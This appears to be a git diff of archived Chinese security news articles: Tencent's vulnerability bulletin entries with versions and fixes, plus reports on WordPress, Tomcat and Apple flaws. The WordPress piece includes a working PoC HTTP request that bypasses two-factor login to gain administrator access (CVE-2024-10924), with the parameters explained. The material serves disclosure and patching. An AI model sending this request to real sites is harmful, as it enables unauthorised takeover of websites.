网络设备(如防火墙、交换机和入侵防御系统等)的配置、管理和监控。FortiManager 支持大规模网络环境,能够高效地部署安全策略、监控网络活动并快速响应潜在威胁。其自动化功能减少了人为错误,提高了操作效率,并确保网络安全策略的一致性和合规性。此外,FortiManager 还具备强大的报告和分析工具,帮助管理员深入了解网络性能和安全状况,从而做出明智的决策。 + +据描述,该漏洞源于Fortinet FortiManager存在代码缺陷,未授权的攻击者可以通过发送特制的请求绕过权限校验,最终远程执行任意代码。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
已发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +6.2.0 <= FortiManager <= 6.2.12 + +6.4.0 <= FortiManager <= 6.4.14 + +7.0.0 <= FortiManager <= 7.0.12 + +7.2.0 <= FortiManager <= 7.2.7 + +7.4.0 <= FortiManager <= 7.4.4 + +FortiManager 7.6.0 + +6.4.1 <= FortiManager Cloud <= 6.4.7 + +7.0.1 <= FortiManager Cloud <= 7.0.12 + +7.2.1 <= FortiManager Cloud <= 7.2.7 + +7.4.1 <= FortiManager Cloud <= 7.4.4 + +**修复建议:** + +1. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://www.fortiguard.com/psirt/FG-IR-24-423 + +2. 临时缓解方案: + +- 可信内部IP地址访问和通信。 + +- 未知的 FortiGate 设备禁止与FortiManager关联。 + +**六、Kubernetes Image Builder****默认凭据登录漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到Kubernetes官方发布了关于Kubernetes Image Builder的风险公告,漏洞编号为TVD-2024-27991 (CVE编号:CVE-2024-9486,CNNVD编号:CNNVD-202410-1533),成功利用此漏洞的攻击者,最终可登录并控制容器环境。 + +Kubernetes Image Builder 是一个用于自动化构建和推送容器镜像的工具,旨在简化 Kubernetes 应用程序的部署和管理过程。它提供了一个声明式的配置方式,使开发人员能够轻松定义镜像构建的步骤和依赖项,并自动执行构建、测试和推送操作。通过 Kubernetes Image Builder,团队可以更高效地管理容器镜像的生命周期,确保镜像的安全性和一致性,从而提升整个开发和部署流程的效率。Proxmox Provider是一款开源的虚拟化管理平台,提供了强大的硬件虚拟化和容器化功能。Proxmox Provider提供了一个直观的 Web 界面和命令行工具,简化了镜像容器的创建、管理和监控过程。 + +据描述,该漏洞源于Kubernetes Image Builder在镜像构建过程中使用默认凭据,通过Proxmox Provider创建的虚拟机镜像不会禁用或修改默认凭据,攻击者可以使用该凭据通过SSH连接到创建的虚拟环境,从而获得虚拟环境的权限。 + +PS :只有当Kubernetes 集群的节点使用通过Image Builder项目及其Proxmox provider创建的VM镜像时,Kubernetes集群才会受到该漏洞影响。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
未发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +Kubernetes Image Builder <= 0.1.37 + + +**修复建议:** + +1. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://github.com/kubernetes-sigs/image-builder/releases/ + +2. 临时缓解方案: + +- 更改builder账户密码或删除builder账户。 + +- 禁止builder用户SSH访问。 + +**七、****Spring Framework 路径遍历漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到Spring官方发布了关于Spring Framework的风险公告,漏洞编号为 TVD-2024-31920 (CVE编号:CVE-2024-38819)。成功利用此漏洞的攻击者,最终遍历读取系统上的文件。 + +Spring Framework是一个开源的Java应用程序开发框架,它通过提供广泛的基础设施支持和丰富的功能,简化了Java开发过程。Spring Framework旨在构建可扩展、松耦合和易于测试的应用程序。从简单的Web应用,到复杂的企业级系统,都适合使用Spring Framework开发。 + +当 Spring Framework使用WebMvc.fn 或 WebFlux.fn 提供静态资源时,容易受到路径遍历攻击,攻击者可以构造恶意请求获取目标系统上由Spring正在运行的进程访问的文件,从而导致信息泄露。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
未发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
7.5
+ +**影响版本:** + +5.3.0 <= Spring Framework <= 5.3.40 + +6.0.0 <= Spring Framework <= 6.0.24 + +6.1.0 <= Spring Framework <= 6.1.13 + +P.S. 其他官方已不支持的旧版本也受此漏洞影响 + +**修复建议:** + +1. 官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://github.com/spring-projects/spring-framework/tags + +2. 临时缓解方案: + +- 使用Spring Security HTTP 防火墙并配置相应安全规则。 + +- 将应用程序部署在 Tomcat 或 Jetty 上运行。 + +**八、****GitLab EE 权限绕过漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到Gitlab官方发布了关于GitLab EE的风险公告,漏洞编号为TVD-2024-27572 (CVE编号:CVE-2024-9164,CNNVD编号:CNNVD-202410-1130)。成功利用此漏洞的攻击者,可以获取敏感信息甚至执行恶意代码。 + +GitLab EE是GitLab公司推出的企业级版本,它提供了全面的源代码管理和协作功能,专为满足大型组织和企业的需求而设计。GitLab EE支持多人协作开发,提供强大的分支管理、代码审查、持续集成/持续部署(CI/CD)以及监控和安全防护等功能。此外,EE版本还包含额外的企业级特性,如高可用性架构、细粒度的权限控制、单点登录集成以及合规性报告等,确保企业在利用GitLab进行软件开发时能够达到最高的安全标准和效率。 + +据描述,该漏洞源于GitLab EE存在代码缺陷,在某些情况下,攻击者利用该漏洞以其他用户的身份在GitLab的任意分支上执行pipelines。这可能导致恶意代码的执行或敏感信息的泄露。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
未公开
PoC
未公开
在野利用
未发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.6
+ +**影响版本:** + +12.5 <= GitLab EE < 17.2.9 + +17.3 <= GitLab EE < 17.3.5 + +17.4 <= GitLab EE < 17.4.2 + +**修复建议:** + +官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://about.gitlab.com/releases/2024/10/09/patch-release-gitlab-17-4-2-released/ + +**九、****ThinkPHP反序列化漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到关于ThinkPHP的风险公告,漏洞编号为 TVD-2024-29996 (CVE编号:CVE-2024-48112,CNNVD编号:CNNVD-202410-3502)。成功利用此漏洞的攻击者,最终可远程执行任意代码。 + +ThinkPHP是中国顶想信息科技公司的一套基于PHP的、开源的、轻量级Web应用程序开发框架,旨在简化企业级应用的开发过程。它采用了面向对象的编程思想和 MVC(模型-视图-控制器)设计模式,提供了丰富的功能和组件,支持快速开发和高效维护。ThinkPHP 具有良好的性能和安全性,易于上手且文档齐全,广泛应用于各类 Web 应用项目。 + +据描述,该漏洞源于ThinkPHP中的ResourceRegister类存在代码缺陷,攻击者可以通过构造恶意的序列化请求发送触发反序列化漏洞,最终远程执行任意代码。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
未发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + + +6.1.3 <= ThinkPHP <= 8.0.4**** + + +**修复建议:** + +1. 官方暂未发布漏洞补丁及修复版本,请持续关注官方公告,待官方发布后评估业务是否受影响,酌情升级至安全版本。 + +https://www.thinkphp.cn/ + +2.  +临时缓解方案: + +- +对传入的序列化数据进行安全检查。 + +**十、****Mozilla Firefox Animation timelines释放后重用漏洞** + +**** +**** +**概述:** + +腾讯安全近期监测到Mozilla官方发布了关于Firefox的风险公告,漏洞编号为 TVD-2024-27303 (CVE编号:CVE-2024-9680,CNNVD编号:CNNVD-202410-902)。成功利用此漏洞的攻击者,最终可远程执行任意代码。 + +Firefox是一款由Mozilla基金会开发的开源网络浏览器,以其快速、安全、用户友好和高度可定制性著称。它内置了追踪保护功能,提供“私密浏览”模式,有效保护用户隐私。Firefox支持多设备同步,拥有丰富的扩展和主题,允许用户根据个人需求进行个性化设置。 + +该漏洞源于Firefox中的Animation timelines组件存在释放后重用漏洞,攻击者可通过制造恶意网页诱导受害者访问触发该漏洞,最终远程执行任意代码。 + +**漏洞状态:** +
类别
状态
安全补丁
已公开
漏洞细节
已公开
PoC
已公开
在野利用
已发现
+ +**风险等级:** +
评定方式
等级
威胁等级
高危
影响面
攻击者价值
利用难度
漏洞评分
9.8
+ +**影响版本:** + +Firefox < 131.0.2 + +Firefox ESR < 115.16.1 + +128.0 <= Firefox ESR < 128.3.1 + +Firefox Thunderbird < 115.16.0 + +128.0.1 <= Firefox Thunderbird < 128.3.1 + +**修复建议:** + +官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 + +【备注】:建议您在升级前做好数据备份工作,避免出现意外。 + +https://www.firefox.com.cn/ + + + + + +*** 以上漏洞的修复建议,由安全专家审核并融合了AI生成的建议。** + +*** 漏洞评分为腾讯安全研究人员根据漏洞情况作出,仅供参考,具体漏洞细节请以原厂商或是相关漏洞平台公示为准。** + +**通用的漏洞修复、防御方案建议** + + + + +腾讯安全专家推荐用户参考相关安全漏洞风险通告提供的建议及时升级修复漏洞,推荐企业安全运维人员通过腾讯云原生安全产品检测漏洞、防御漏洞武器攻击。 + + +具体操作步骤可参考以下文章指引: +https://s.tencent.com/research/report/157 + + +![](https://mmbiz.qpic.cn/mmbiz/QKDxrVYehicdAibIVUpquF6TQUwXFg6dYCrLBEiasLaVyObib9LjK08qQ7IzkYKROO93uxoEnMSl8zRCWiaY7JwgZWg/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "") + +腾讯安全威胁情报中心 + + + + + + +腾讯安全威胁情报中心是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托顶尖安全专家团队支撑,帮助安全分析人员、安全运维人员快速、准确地对可疑威胁事件进行预警、处置和溯源分析。 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/6AoQM3RKCWV06sedopZX4UKrIqOBFmKoc11DKcmpyPxAFoHambN30M6umkO7hlubfgLlibJaJsykcSXu0DLpffg/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "") + +**长按识别二维码获取第一手威胁情报** + +![](https://mmbiz.qpic.cn/mmbiz_png/vnT4hbaLoX52vS48AVEmzD0VOcopwhTp5G5d8bXXnJ5tiaTNibbgAvhrF3ia6Z9ofD7EZic0r8LRJFTPNcjBXXT2ibQ/640?wx_fmt=png "") + + + +腾讯安全攻防团队 A&D Team + + + + + + +腾讯安全攻防团队 A&D Team专注于安全前沿攻防技术研究。组内有多名深耕安全技术多年的业内专家,研究领域包含但不限于Web安全,主机安全,二进制安全,欢迎关注我们。 + + + +![](https://mmbiz.qpic.cn/mmbiz_gif/6AoQM3RKCWX1eVTgJibmTERpefy9ajPmQPOib80Kf7oz4cRQPnuW52QvoqMORViapS08HpRsLhibwiaxSAJQ0gHSicLw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + +**往期企业必修漏洞清单**[](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484608&idx=1&sn=e2a414257451ea83b81e0f6b886dba65&chksm=c2b106b6f5c68fa058be61c95996f9787d08a0615bccf740a4719e7c12a362d456ab670ce6a0&scene=21#wechat_redirect) + +- [2024年09月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247485003&idx=1&sn=5ccde4dc82fa09bd366a7f2de01ff1bb&chksm=c2b1043df5c68d2b005f4b5523973459c8717c99e881f1551c3c3d6686df0cd277c4cd62e81d&scene=21#wechat_redirect) + + +- [2024年05月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484998&idx=1&sn=a2de9bef55ae2bf0b6661b13b46158b4&chksm=c2b10430f5c68d268279ac8a466d7d7dfbe1adee2f1c020cbe2a8bcb50f67c30bc20043b881c&scene=21#wechat_redirect) + + +- [2024年04月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484992&idx=1&sn=96144229e53190c93439dbb9dbd6de65&chksm=c2b10436f5c68d20028efaf7c7851dc4d6ae1538b70df899ed24b365d0d4c1b016d4b6ab3dea&scene=21#wechat_redirect) + + +- [2024年03月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484976&idx=1&sn=7871c73733720064ba66d3875ee7a0df&chksm=c2b10446f5c68d5044eed0c05ddcbb8ef6ae9b25f1f964a545b2ed7d700c538b4ae51d725b73&scene=21#wechat_redirect) + + +- [2024年02月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484931&idx=1&sn=559cde17b20b2437e36eaaf56ef34c62&chksm=c2b10475f5c68d632698c341898ab94cf9ae0f661d0c7c9d155e6835bef47c1d34c2f376b3de&scene=21#wechat_redirect) + + +- [2024年01月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484910&idx=1&sn=d40e9b8ad7e5f67fd5ac1fc2b0b2548a&chksm=c2b10798f5c68e8ed5d26e6938ad30b8157db94bb71e3e0ccf69127e82251f3d02e173adb7fe&scene=21#wechat_redirect) + + +- [2023年12月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484886&idx=1&sn=b092ee93fcad0064151f36b65f74780d&chksm=c2b107a0f5c68eb61269571a17cf4e1b7ac4db04658aa8c62427afa160658e94a3ac48fd12a9&scene=21#wechat_redirect) + + +- [2023年11月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484817&idx=1&sn=470ccab8e76e1084e49791fca7a4ab09&chksm=c2b107e7f5c68ef1152bb2b7cb434db297094d3661ea6206f87e6847dca95fbc37efbebfafcf&scene=21#wechat_redirect) + + +- [2023年10月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484774&idx=1&sn=f29b2476fdb5d00b3ffd454a22f22f5b&chksm=c2b10710f5c68e06131a6ec198f4a18f956a4831055f2a01e9d8a7f78384307dc29c095e84ea&scene=21#wechat_redirect) + + +- [2023年09月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484608&idx=1&sn=e2a414257451ea83b81e0f6b886dba65&chksm=c2b106b6f5c68fa058be61c95996f9787d08a0615bccf740a4719e7c12a362d456ab670ce6a0&scene=21#wechat_redirect) + + +- [‍2023年08月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484516&idx=1&sn=763f65b626071bfdee432404fcdab291&chksm=c2b10612f5c68f04a17c9031a642b65a8317ee8d9acda1d6ed8719a5f5899870ca7bb27bce66&scene=21#wechat_redirect) + + +- [2023年07月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484443&idx=1&sn=6a309a5029ab2670567d199816289765&chksm=c2b1066df5c68f7b50f74899e797c12a7de169dc78d2073017e4bd59fff7c2bf1d4e4a5d3f87&scene=21#wechat_redirect) + + +- [2023年06月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484340&idx=1&sn=575160a41eba6d83606beade85419c57&chksm=c2b101c2f5c688d45a77849de896f884c6ca8b22e42b68a40d61043ead70cb2a15f0fdfcba02&scene=21#wechat_redirect) + + +- [2023年05月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484240&idx=1&sn=58c308d646302ec2a6c223ff2f9acfa6&chksm=c2b10126f5c68830eb202afa508c2c65211dafa90dd98d5cb059babe4554bde985eddf54ede2&scene=21#wechat_redirect) + + +- [2023年04月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484165&idx=1&sn=758a6119eef77796827517d9f6b5ab09&chksm=c2b10173f5c68865cd0509f6322aa791826cd8486b59d149748b7f2274de6ed8df94ec34e3c9&scene=21#wechat_redirect) + + +- [2023年03月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484108&idx=1&sn=959dd47bc264b364f3cda08b754cddb2&chksm=c2b100baf5c689acbe0773f5aed75ca8896aaef9f78157e03f5793b84b26b9a011ecd4278215&scene=21#wechat_redirect) + + +- [2023年02月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484044&idx=1&sn=71c0e4d9abeb486d200111b22a2b99b3&chksm=c2b100faf5c689ec9653bd022983d1e218259c0eca48d1d2a6f90e734c3a503af18d89b7c0f3&scene=21#wechat_redirect) + + +- [2023年01月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247484042&idx=1&sn=f4c46330403271ab9b81e5d2acd5694c&chksm=c2b100fcf5c689eae75f3d293733539818e7474799e15b3e6627d53c343ae0f798410a98eec6&scene=21#wechat_redirect) + + +- [2022年12月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500731&idx=1&sn=577edf78ead4420a884e8b4ef70e419f&chksm=ec9f1ac8dbe893de15cb512053c9d5ba0d1a0cdb03c638030f5afeb080a348f170382817ee9a&scene=21#wechat_redirect) + + +- [2022年11月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247483999&idx=1&sn=cda585e804e6636a10a9603b812eb4ac&chksm=c2b10029f5c6893f0ff226e4d11cba385389ac26c735b3b34fd849236a7f2c6a48c3212aeaf8&scene=21#wechat_redirect) + + +- [2022年10月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzkzNTI4NjU1Mw==&mid=2247483997&idx=1&sn=09e3e954c20152f609b4679e6f1a4761&chksm=c2b1002bf5c6893d413203c326b976c96a7e85ed9f92d59b3335164be20948c08f33188d1917&scene=21#wechat_redirect) + + +- [2022年09月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500655&idx=1&sn=23c9cd66901955f39559146234de79a7&chksm=ec9f1a1cdbe8930a832eb4911b37f45e7143d2e463c024170dd77457416475d66df92bd5c0b7&scene=21#wechat_redirect) + + +- [2022年08月必修安全漏洞清单](http://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500653&idx=1&sn=bfdcc5a1e2ae3543bd2b26912701977d&chksm=ec9f1a1edbe89308b8c8b038e92545001dc7abe631bfe78c09d2b6de199794747ed3c3c962b4&scene=21#wechat_redirect) + + +- [2022年07月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500564&idx=1&sn=0724466efc745b96cf539fe8572fdb61&chksm=ec9f1a67dbe89371975b1a84b16a636f3165a97f611425ffbec8871b3cf229c5eff4b0f29f30&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年06月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500393&idx=1&sn=ba17403eb5635ccce3b22b3ad540d0ac&chksm=ec9f1b1adbe8920c872b3498d103f41ff1b2a60bf3e6321d169bb0667e235f0e0947f111e01d&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年05月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500338&idx=1&sn=2fa717b3367276c07c87f3f2a4163431&chksm=ec9f1b41dbe8925763f9944ec19e2210152a563434ea2abf75df97b7698dc337151bb7f59c6e&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年04月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500304&idx=1&sn=8270ae775a0e414e259710f3def69e71&chksm=ec9f1b63dbe8927505895eb86271c7caac19ff72d42c7f89b38647c652b17c1ab74910626257&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年03月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500281&idx=1&sn=282cc225ecf85041a53a677fbb67df3f&chksm=ec9f188adbe8919ceb053d2086e4d42ea0a80e7ad7bfc710e18c26b832ef70138bc717efe6e2&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年02月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500179&idx=1&sn=4bf719ed94fe2760963d0a7e51c9d247&chksm=ec9f18e0dbe891f6beeb667a075e61e8bd0788ad02618d9f2833f1bfeed0440c9cda788e97f9&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2022年01月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500165&idx=1&sn=513ba8a312875b5a34b595701d4d5d3f&chksm=ec9f18f6dbe891e0f75ace91bccc64c25cae3a8106a3bd58e9f744ac17e657c47201bc79564d&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2021年12月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247500086&idx=1&sn=34cc2a0ff0918c369809ce486a7437d4&chksm=ec9f1845dbe89153689a4d4c3519c571018f08f3b1c2567cd783c3f90e17503e0087cce8fba2&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + +- [2021年11月必修安全漏洞清单](https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247499883&idx=1&sn=b5d1d0d4ac8a6e1e549817e10a57f3af&chksm=ec9f1918dbe8900e89b7d5ac1edaeb59e1fdc7838f47f859e70564a6c8b785065bd126de6bed&token=1013209520&lang=zh_CN&scene=21#wechat_redirect) + + diff --git a/doc/400万网站受影响!WordPress Really Simple Security 插件漏洞分析.md b/doc/400万网站受影响!WordPress Really Simple Security 插件漏洞分析.md new file mode 100644 index 00000000..414e5c5d --- /dev/null +++ b/doc/400万网站受影响!WordPress Really Simple Security 插件漏洞分析.md @@ -0,0 +1,54 @@ +# 400万网站受影响!WordPress Really Simple Security 插件漏洞分析 +云梦DC 云梦安全 2024-11-20 01:05 + +近日,WordPress 插件**Really Simple Security** +(原名 Really Simple SSL)被披露存在一个高危的认证绕过漏洞。该漏洞可能导致攻击者远程获得受影响网站的管理权限,危害极大。本篇文章将对漏洞细节、影响范围、修复情况及防护措施进行全面分析。![](https://mmbiz.qpic.cn/mmbiz_png/ndxZsFvkmpxiaKyI98MJklzBBWSGT8MAicmSuPZcKrZYh134OtlntbJtycHxTzWfPWZGr88P9JaESgyLZsmrGdyA/640?wx_fmt=png&from=appmsg "") + +#### 漏洞概述 + +CVE-2024-10924 是 Really Simple Security 插件的认证绕过漏洞,漏洞评分高达**9.8(CVSS)** +,属于严重级别。漏洞利用了插件的check_login_and_get_user + 函数中的错误处理,允许攻击者在启用双因素认证(2FA)的情况下,冒充任意用户(包括管理员)登录受影响的网站。![](https://mmbiz.qpic.cn/mmbiz_png/ndxZsFvkmpxiaKyI98MJklzBBWSGT8MAicmSuPZcKrZYh134OtlntbJtycHxTzWfPWZGr88P9JaESgyLZsmrGdyA/640?wx_fmt=png&from=appmsg "") + + +此漏洞影响了插件**9.0.0 至 9.1.1.1 版本** +,包括免费和付费版本,波及超过**400万 WordPress 网站** +。Wordfence 安全研究员 István Márton 警告称,该漏洞非常容易被脚本化,从而引发针对 WordPress 网站的大规模自动化攻击。 +#### 漏洞细节分析 + +**Really Simple Security 插件的核心功能是增强 WordPress 网站的安全性** +,包括启用 HTTPS、提供双因素认证等。然而,该漏洞的成因却来自插件对 2FA 认证逻辑的错误处理。 + +具体来说,漏洞位于check_login_and_get_user + 函数,该函数负责验证用户的身份。然而,由于逻辑缺陷,攻击者可以通过构造恶意请求绕过身份验证。例如: +- **函数中未正确处理认证失败的情况** +,直接返回了管理员凭据; + +- **缺乏对认证数据完整性的验证** +,导致攻击者可以伪造凭据。 + +这种设计缺陷使得攻击者可以直接冒充管理员登录,获得对网站的完全控制权限。 +##### 利用场景 + +插件的 REST API 暴露了skip_onboarding + 接口,允许未经验证的用户提交登录请求。通过构造包含伪造参数的 POST 请求,攻击者可以利用该接口跳过 2FA 验证并获取登录状态。 +##### PoC 请求示例 +``` +POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: kubernetes.docker.internal User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json; Connection: keep-alive Content-Length: 90 { "user_id":1, "login_nonce": "231231231", "redirect_to": "/wp-admin/" } + +``` +##### 请求参数解析 +- **user_id** +:目标用户的 ID(例如,管理员账户通常为1 +)。 + +- **login_nonce** +:伪造的登录令牌,插件未验证该值的真实性。 + +- **redirect_to** +:登录成功后的重定向目标地址,此处指向/wp-admin/ + 管理后台。 + +poc:https://github.com/FoKiiin/CVE-2024-10924 + + diff --git a/doc/Apache Tomcat最新高版本身份验证绕过漏洞,POC价格接近3000.md b/doc/Apache Tomcat最新高版本身份验证绕过漏洞,POC价格接近3000.md new file mode 100644 index 00000000..6920db2b --- /dev/null +++ b/doc/Apache Tomcat最新高版本身份验证绕过漏洞,POC价格接近3000.md @@ -0,0 +1,38 @@ +# Apache Tomcat最新高版本身份验证绕过漏洞,POC价格接近3000 +SecHaven 赛哈文 2024-11-20 03:10 + +近日Apach +e Tomcat公布了最新漏洞,其中CVE-2024-52316 Apache Tomcat身份验证绕过值得大家关注。具体涉及到使用Jakarta身份 +验证API时的身份验证绕过问题。该漏洞的存在可能允许攻击者在未经授权的情况下访问受保护的资源,从而对系统安全构成威胁。 + +![](https://mmbiz.qpic.cn/mmbiz_png/R3h5SuP8QnKGnsQ99DPfbUcjLkRomSPgQGadIic6lNM3k9hPeKicCgGWWvibQUQXs00pkNJYG2xd2ibG2OZBm5OvNQ/640?wx_fmt=png&from=appmsg "") + +据信息显示,其POC在海外平台售卖,价格接近3000人民币: + +![](https://mmbiz.qpic.cn/mmbiz_png/R3h5SuP8QnKGnsQ99DPfbUcjLkRomSPgD8zwknLJWicqqOgdRy40epoWP2KVUuffiayAM3fem2Z9EyYAzicSAIElQ/640?wx_fmt=png&from=appmsg "") +## 漏洞详细信息 +- 漏洞类型:身份验证绕过 + +- 影响组件:Apache Tomcat + +- CWE编号:CWE-391 + +- 披露时间:2024年11月18日 + +- CVSS评分:未提供具体评分,但由于其性质,通常被视为高风险。 + +**受影响版本** + +Apache Tomcat 9.0.0-M1 至 9.0.95 + +**安全建议** + +为了防止CVE-2024-52316带来的安全风险,建议采取以下措施: +1. 更新软件:及时更新Apache Tomcat至最新版本,确保所有安全补丁已应用。 + +1. 审查配置:检查Jakarta身份验证API的配置,确保没有不当设置导致安全隐患。 + +1. 监控日志:定期监控系统日志,以便及早发现任何异常访问行为。 + +通过这些措施,可以有效降低因CVE-2024-52316漏洞带来的安全风险。 + diff --git a/doc/Apple 确认 macOS 系统遭受0day漏洞攻击.md b/doc/Apple 确认 macOS 系统遭受0day漏洞攻击.md new file mode 100644 index 00000000..eaab0c03 --- /dev/null +++ b/doc/Apple 确认 macOS 系统遭受0day漏洞攻击.md @@ -0,0 +1,46 @@ +# Apple 确认 macOS 系统遭受0day漏洞攻击 +会杀毒的单反狗 军哥网络安全读报 2024-11-20 01:00 + +**导****读** + + + +苹果公司紧急发布了 macOS 和 iOS 的主要安全更新,以修复两个已被广泛利用的 +0day +漏洞。 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaH9fbXKEM6tg1DibfmHsxCmstEicTT5ZuLJsrn24ck7Lwia2OUndjstnd4uRysGr7lhkicrqpBUZXPNkg/640?wx_fmt=jpeg&from=appmsg "") + + +苹果公司在周二发布的公告( +https://support.apple.com/en-us/121753)中证实,这些漏洞是由谷歌的 +TAG(威胁分析小组)发现的,正在基于英特尔的 macOS 系统上被积极利用。 + + +按照惯例,苹果的安全响应团队没有提供任何有关所报告的攻击或攻击指标 +(IOC) 的详细信息,以帮助防御者寻找感染迹象。 + + +已修补漏洞包括: +- CVE-2024-44308JavaScriptCore——处理恶意制作的 Web 内容可能会导致任意代码执行。Apple 已获悉一份报告称,该问题可能已在基于 Intel +的 Mac 系统上被积极利用。 + +- CVE-2024-44309WebKit——处理恶意制作的 Web 内容可能会导致跨站点脚本攻击。Apple 已获悉一份报告称,该问题可能已在基于 Intel 的 Mac 系统上被积极利用。 + +- +苹果公司敦促整个 +Apple 生态系统的用户紧急应用iOS 18.1.1、macOS Sequoia 15.1.1和旧版本iOS 17.7.2。 + + +**新闻链接:** + +https://www.securityweek.com/apple-confirms-zero-day-attacks-hitting-intel-based-macs/ + 